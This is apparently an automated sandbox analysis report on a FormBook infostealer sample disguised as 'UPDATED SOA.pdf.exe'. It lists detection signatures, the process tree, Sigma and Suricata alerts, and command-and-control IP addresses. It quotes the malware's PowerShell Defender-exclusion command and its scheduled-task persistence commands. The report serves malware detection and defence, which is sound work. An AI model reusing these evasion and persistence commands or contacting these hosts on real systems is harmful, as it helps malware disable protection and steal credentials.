Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UPDATED SOA.pdf.exe

Overview

General Information

Sample name:UPDATED SOA.pdf.exe
Analysis ID:1617612
MD5:9cb3e388938de775c97fe7e15db5bef7
SHA1:73bd0bba85e239cea71d116706bd9dd2656f1acd
SHA256:45e3b1735df7c76cac0c02dab2bd084220687e4d9786ea6a32e8bca70dc1a4cd
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • UPDATED SOA.pdf.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\UPDATED SOA.pdf.exe" MD5: 9CB3E388938DE775C97FE7E15DB5BEF7)
    • powershell.exe (PID: 5332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4048 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 2080 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpCB57.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • UPDATED SOA.pdf.exe (PID: 5936 cmdline: "C:\Users\user\Desktop\UPDATED SOA.pdf.exe" MD5: 9CB3E388938DE775C97FE7E15DB5BEF7)
      • S1OoUcW6nwo.exe (PID: 1136 cmdline: "C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\h5yd4NrV4LjY.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • expand.exe (PID: 5756 cmdline: "C:\Windows\SysWOW64\expand.exe" MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
          • S1OoUcW6nwo.exe (PID: 5812 cmdline: "C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\hXzhEeGUqcR.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 648 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • TKgtDXuaZu.exe (PID: 2692 cmdline: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe MD5: 9CB3E388938DE775C97FE7E15DB5BEF7)
    • schtasks.exe (PID: 2188 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpDE33.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • TKgtDXuaZu.exe (PID: 5164 cmdline: "C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe" MD5: 9CB3E388938DE775C97FE7E15DB5BEF7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2036376886.0000000001830000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000012.00000002.4144018297.0000000004600000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000012.00000002.4142807594.0000000000580000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.2032904691.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000012.00000002.4143977148.00000000045B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.UPDATED SOA.pdf.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              9.2.UPDATED SOA.pdf.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Double Extension File Execution
                Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", CommandLine: "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\UPDATED SOA.pdf.exe, NewProcessName: C:\Users\user\Desktop\UPDATED SOA.pdf.exe, OriginalFileName: C:\Users\user\Desktop\UPDATED SOA.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", ProcessId: 7064, ProcessName: UPDATED SOA.pdf.exe
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", ParentImage: C:\Users\user\Desktop\UPDATED SOA.pdf.exe, ParentProcessId: 7064, ParentProcessName: UPDATED SOA.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", ProcessId: 5332, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", ParentImage: C:\Users\user\Desktop\UPDATED SOA.pdf.exe, ParentProcessId: 7064, ParentProcessName: UPDATED SOA.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", ProcessId: 5332, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpDE33.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpDE33.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe, ParentImage: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe, ParentProcessId: 2692, ParentProcessName: TKgtDXuaZu.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpDE33.tmp", ProcessId: 2188, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpCB57.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpCB57.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", ParentImage: C:\Users\user\Desktop\UPDATED SOA.pdf.exe, ParentProcessId: 7064, ParentProcessName: UPDATED SOA.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpCB57.tmp", ProcessId: 2080, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", ParentImage: C:\Users\user\Desktop\UPDATED SOA.pdf.exe, ParentProcessId: 7064, ParentProcessName: UPDATED SOA.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", ProcessId: 5332, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpCB57.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpCB57.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SOA.pdf.exe", ParentImage: C:\Users\user\Desktop\UPDATED SOA.pdf.exe, ParentProcessId: 7064, ParentProcessName: UPDATED SOA.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpCB57.tmp", ProcessId: 2080, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T05:06:06.630158+010020507451Malware Command and Control Activity Detected192.168.2.4500615.83.145.16780TCP
                2025-02-18T05:06:52.957808+010020507451Malware Command and Control Activity Detected192.168.2.44974281.88.63.4680TCP
                2025-02-18T05:07:16.295125+010020507451Malware Command and Control Activity Detected192.168.2.44983857.129.59.2780TCP
                2025-02-18T05:07:29.695961+010020507451Malware Command and Control Activity Detected192.168.2.449927185.125.27.3280TCP
                2025-02-18T05:07:43.076701+010020507451Malware Command and Control Activity Detected192.168.2.450017185.173.109.8380TCP
                2025-02-18T05:07:56.414070+010020507451Malware Command and Control Activity Detected192.168.2.450025199.115.118.780TCP
                2025-02-18T05:08:09.756075+010020507451Malware Command and Control Activity Detected192.168.2.45002946.30.215.15280TCP
                2025-02-18T05:08:31.481774+010020507451Malware Command and Control Activity Detected192.168.2.450033104.21.64.180TCP
                2025-02-18T05:08:44.953171+010020507451Malware Command and Control Activity Detected192.168.2.45003769.57.163.22780TCP
                2025-02-18T05:08:58.575034+010020507451Malware Command and Control Activity Detected192.168.2.450041188.114.96.380TCP
                2025-02-18T05:09:11.821886+010020507451Malware Command and Control Activity Detected192.168.2.450045199.59.243.22880TCP
                2025-02-18T05:09:25.115172+010020507451Malware Command and Control Activity Detected192.168.2.450049104.21.44.13680TCP
                2025-02-18T05:09:38.853345+010020507451Malware Command and Control Activity Detected192.168.2.450053156.237.132.25180TCP
                2025-02-18T05:09:52.834301+010020507451Malware Command and Control Activity Detected192.168.2.450057192.186.58.3180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T05:07:08.674020+010028554641A Network Trojan was detected192.168.2.44978557.129.59.2780TCP
                2025-02-18T05:07:11.188871+010028554641A Network Trojan was detected192.168.2.44980257.129.59.2780TCP
                2025-02-18T05:07:13.799973+010028554641A Network Trojan was detected192.168.2.44982257.129.59.2780TCP
                2025-02-18T05:07:22.095487+010028554641A Network Trojan was detected192.168.2.449877185.125.27.3280TCP
                2025-02-18T05:07:24.627888+010028554641A Network Trojan was detected192.168.2.449895185.125.27.3280TCP
                2025-02-18T05:07:27.155376+010028554641A Network Trojan was detected192.168.2.449910185.125.27.3280TCP
                2025-02-18T05:07:35.421444+010028554641A Network Trojan was detected192.168.2.449964185.173.109.8380TCP
                2025-02-18T05:07:37.974560+010028554641A Network Trojan was detected192.168.2.449980185.173.109.8380TCP
                2025-02-18T05:07:40.502575+010028554641A Network Trojan was detected192.168.2.449999185.173.109.8380TCP
                2025-02-18T05:07:48.780347+010028554641A Network Trojan was detected192.168.2.450022199.115.118.780TCP
                2025-02-18T05:07:51.336942+010028554641A Network Trojan was detected192.168.2.450023199.115.118.780TCP
                2025-02-18T05:07:53.894966+010028554641A Network Trojan was detected192.168.2.450024199.115.118.780TCP
                2025-02-18T05:08:02.084268+010028554641A Network Trojan was detected192.168.2.45002646.30.215.15280TCP
                2025-02-18T05:08:04.657034+010028554641A Network Trojan was detected192.168.2.45002746.30.215.15280TCP
                2025-02-18T05:08:07.217472+010028554641A Network Trojan was detected192.168.2.45002846.30.215.15280TCP
                2025-02-18T05:08:23.844296+010028554641A Network Trojan was detected192.168.2.450030104.21.64.180TCP
                2025-02-18T05:08:26.414061+010028554641A Network Trojan was detected192.168.2.450031104.21.64.180TCP
                2025-02-18T05:08:28.993620+010028554641A Network Trojan was detected192.168.2.450032104.21.64.180TCP
                2025-02-18T05:08:37.338993+010028554641A Network Trojan was detected192.168.2.45003469.57.163.22780TCP
                2025-02-18T05:08:39.860961+010028554641A Network Trojan was detected192.168.2.45003569.57.163.22780TCP
                2025-02-18T05:08:42.415124+010028554641A Network Trojan was detected192.168.2.45003669.57.163.22780TCP
                2025-02-18T05:08:50.913543+010028554641A Network Trojan was detected192.168.2.450038188.114.96.380TCP
                2025-02-18T05:08:53.474048+010028554641A Network Trojan was detected192.168.2.450039188.114.96.380TCP
                2025-02-18T05:08:56.008501+010028554641A Network Trojan was detected192.168.2.450040188.114.96.380TCP
                2025-02-18T05:09:04.188686+010028554641A Network Trojan was detected192.168.2.450042199.59.243.22880TCP
                2025-02-18T05:09:06.735968+010028554641A Network Trojan was detected192.168.2.450043199.59.243.22880TCP
                2025-02-18T05:09:09.274201+010028554641A Network Trojan was detected192.168.2.450044199.59.243.22880TCP
                2025-02-18T05:09:17.461592+010028554641A Network Trojan was detected192.168.2.450046104.21.44.13680TCP
                2025-02-18T05:09:19.999267+010028554641A Network Trojan was detected192.168.2.450047104.21.44.13680TCP
                2025-02-18T05:09:22.582176+010028554641A Network Trojan was detected192.168.2.450048104.21.44.13680TCP
                2025-02-18T05:09:31.236760+010028554641A Network Trojan was detected192.168.2.450050156.237.132.25180TCP
                2025-02-18T05:09:33.766349+010028554641A Network Trojan was detected192.168.2.450051156.237.132.25180TCP
                2025-02-18T05:09:36.330611+010028554641A Network Trojan was detected192.168.2.450052156.237.132.25180TCP
                2025-02-18T05:09:45.147301+010028554641A Network Trojan was detected192.168.2.450054192.186.58.3180TCP
                2025-02-18T05:09:47.683075+010028554641A Network Trojan was detected192.168.2.450055192.186.58.3180TCP
                2025-02-18T05:09:50.450149+010028554641A Network Trojan was detected192.168.2.450056192.186.58.3180TCP
                2025-02-18T05:10:00.755234+010028554641A Network Trojan was detected192.168.2.4500585.83.145.16780TCP
                2025-02-18T05:10:03.302360+010028554641A Network Trojan was detected192.168.2.4500595.83.145.16780TCP
                2025-02-18T05:10:05.862815+010028554641A Network Trojan was detected192.168.2.4500605.83.145.16780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeReversingLabs: Detection: 29%
                Multi AV Scanner detection for submitted file
                Source: UPDATED SOA.pdf.exeVirustotal: Detection: 29%Perma Link
                Source: UPDATED SOA.pdf.exeReversingLabs: Detection: 29%
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.UPDATED SOA.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.UPDATED SOA.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2036376886.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4144018297.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4142807594.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2032904691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4143977148.00000000045B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4143949544.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2036740856.00000000019D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: UPDATED SOA.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: UPDATED SOA.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: expand.pdb source: UPDATED SOA.pdf.exe, 00000009.00000002.2033466859.0000000001038000.00000004.00000020.00020000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000003.1970720685.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000002.4143427596.00000000016E1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: UPDATED SOA.pdf.exe, 00000009.00000002.2033978508.0000000001490000.00000040.00001000.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144118353.000000000489E000.00000040.00001000.00020000.00000000.sdmp, expand.exe, 00000012.00000003.2034981393.0000000004553000.00000004.00000020.00020000.00000000.sdmp, expand.exe, 00000012.00000003.2032881850.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144118353.0000000004700000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: UPDATED SOA.pdf.exe, UPDATED SOA.pdf.exe, 00000009.00000002.2033978508.0000000001490000.00000040.00001000.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144118353.000000000489E000.00000040.00001000.00020000.00000000.sdmp, expand.exe, 00000012.00000003.2034981393.0000000004553000.00000004.00000020.00020000.00000000.sdmp, expand.exe, 00000012.00000003.2032881850.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144118353.0000000004700000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: KUON.pdb source: UPDATED SOA.pdf.exe, TKgtDXuaZu.exe.0.dr
                Source: Binary string: KUON.pdbSHA256 source: UPDATED SOA.pdf.exe, TKgtDXuaZu.exe.0.dr
                Source: Binary string: expand.pdbGCTL source: UPDATED SOA.pdf.exe, 00000009.00000002.2033466859.0000000001038000.00000004.00000020.00020000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000003.1970720685.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000002.4143427596.00000000016E1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: S1OoUcW6nwo.exe, 00000011.00000000.1956044730.0000000000E3F000.00000002.00000001.01000000.0000000E.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4142898457.0000000000E3F000.00000002.00000001.01000000.0000000E.sdmp
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]0_2_02303E0C
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]10_2_015B3E0C

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 81.88.63.46:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49802 -> 57.129.59.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49785 -> 57.129.59.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49838 -> 57.129.59.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49822 -> 57.129.59.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49877 -> 185.125.27.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49895 -> 185.125.27.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49927 -> 185.125.27.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49910 -> 185.125.27.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49980 -> 185.173.109.83:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 46.30.215.152:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50029 -> 46.30.215.152:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 46.30.215.152:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50025 -> 199.115.118.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 104.21.44.136:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50033 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 199.115.118.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 69.57.163.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50051 -> 156.237.132.251:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 5.83.145.167:80
